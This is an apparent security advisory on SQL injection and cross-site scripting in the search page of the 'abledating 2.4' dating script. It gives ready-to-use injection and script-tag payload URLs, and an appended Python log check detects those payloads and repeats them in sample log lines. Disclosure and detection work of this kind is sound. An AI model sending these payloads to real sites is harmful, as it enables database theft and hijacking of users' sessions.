abledating 2.4 >> SQL injection and cross-site scripting on search_results.php



By : Ali Jasbi (hackerz.ir security & hacking team)
vendor : abk-soft.com
product name : abledating 2.4
Exploits :
1- SQL injection :
bug :
http://abledating//search_results.php?p_age_from=18&p_age_to=18&keyword=[sql injection]&status=online&save_search=on&search_name=My%20search&photo=on&p_orientation%255B%255D=2&order=rating&sort=desc&p_relation%255B%255D=4&search
test :
http://abledating/search_results.php?p_age_from=18&p_age_to=18&keyword=%00'&status=online&save_search=on&search_name=My%20search&photo=on&p_orientation%255B%255D=2&order=rating&sort=desc&p_relation%255B%255D=4&search
2- Cross-site scripting :
bug :
http://abledating/search_results.php?p_orientation%5B%5D=2&p_age_from=18&p_age_to=18&p_relation%5B%5D=on&keyword=>'><ScRiPt%20%0a%0d>alert(42119.7535489005)%3B</ScRiPt>&status=online&save_search=on&search_name=My%20search&photo=on
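
Detection example (added here, not part of the original advisory or the vendor's code): a log check that flags requests to search_results.php whose keyword parameter carries a NUL byte, a single quote or a script tag, the shapes shown in the two URLs above. The log lines are constructed samples, and the names findings, fully_decode and SAMPLE_LOG are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
SCRIPT_TAG = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)  # matches mixed case such as <ScRiPt

def fully_decode(value, max_rounds=3):
    """Percent-decode until stable; the advisory's URLs carry double encoding (%255B)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def findings(log_line):
    """Return sorted labels for suspicious `keyword` values sent to search_results.php."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.endswith("/search_results.php"):
        return []
    labels = set()
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name != "keyword":
            continue
        value = fully_decode(value)  # parse_qsl has already decoded once
        if "\x00" in value:
            labels.add("nul-byte")       # never legitimate in a search term
        if "'" in value:
            labels.add("single-quote")   # can be benign (O'Brien); review in context
        if SCRIPT_TAG.search(value):
            labels.add("script-tag")
    return sorted(labels)

# Constructed sample lines (combined log format, documentation IP range).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /search_results.php?p_age_from=18&keyword=hiking&status=online HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /search_results.php?p_age_from=18&keyword=%00\'&status=online HTTP/1.1" 500 312',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /search_results.php?keyword=>\'><ScRiPt%20%0a%0d>alert(1)%3B</ScRiPt>&status=online HTTP/1.1" 200 5300',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(findings(line), line.split('"')[1][:60])
```

A hit only shows that the request was sent; whether the application was affected has to be confirmed from the response and the database side.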